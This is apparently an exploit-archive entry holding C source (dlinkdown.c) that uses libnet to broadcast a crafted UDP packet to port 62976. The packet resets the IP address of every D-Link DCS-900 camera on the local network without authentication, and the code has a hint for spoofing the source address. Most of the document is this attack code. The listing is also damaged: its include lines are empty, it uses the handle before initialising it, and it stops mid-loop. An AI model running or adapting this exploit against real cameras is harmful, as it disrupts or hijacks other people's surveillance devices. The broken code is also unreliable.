|
D-Link DCS-900 camera Remote IP address changer Exploit
|
/*
dlinkdown.c - miscname.com
change ip address on all dlink dcs-900 cameras on the local network without authentication
dlink dcs-900 ip cameras use a broadcast/listen method of configuration ...
rather than a static ip addr out of the box, it listens for a 62976/udp broadcast packet
telling it what ip addr to set itself too
http://www.dlink.com.au/Default.aspx?ArticleID=109
rtfs and mod the ip address to set all listening cameras too (default is 10.0.50.50)
*/
#include
#include
#include
int main (int argc, char *argv[]) {
libnet_t *p;
libnet_ptag_t ip, udp, ipoptions, ether;
u_long srcip, dstip;
u_short srcport = 62976, dstport = 62976, x;
signed int ret;
char errbuff[LIBNET_ERRBUF_SIZE], ipopt[21];
int len;
int8_t *macdst = "ff:ff:ff:ff:ff:ff";
u_int8_t *macdest;
char payload[128] = "\xfd\xfd\x00\x04\x00\x03\x00\x0f\x3d\x56\x97\x07"
"\x0a\x00\x32\x32" /* ip address to set too */
"\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00";
u_short payloadlen = strlen(payload);
srcip = libnet_get_ipaddr4(p); /* mod to spoof */
dstip = libnet_name2addr4(p,"255.255.255.255",LIBNET_DONT_RESOLVE); /* 255.255.255.255 */
udp = ip = ether = ipoptions = 0;
if ( (macdest = libnet_hex_aton(macdst,&len)) == NULL) {
fprintf(stderr,"cant get mac str - %s",libnet_geterror(p));
exit (1);
}
if ( (p = libnet_init (LIBNET_LINK, NULL, errbuff)) == NULL) {
fprintf(stderr,"cant init() - %s\n",errbuff);
exit (1);
}
if ( (udp = libnet_build_udp(srcport,dstport,LIBNET_UDP_H + payloadlen,0,payload,payloadlen,p,udp)) == -1) {
fprintf(stderr,"cant build udp - %s\n",libnet_geterror(p));
exit (1);
}
for (x=0;x
|
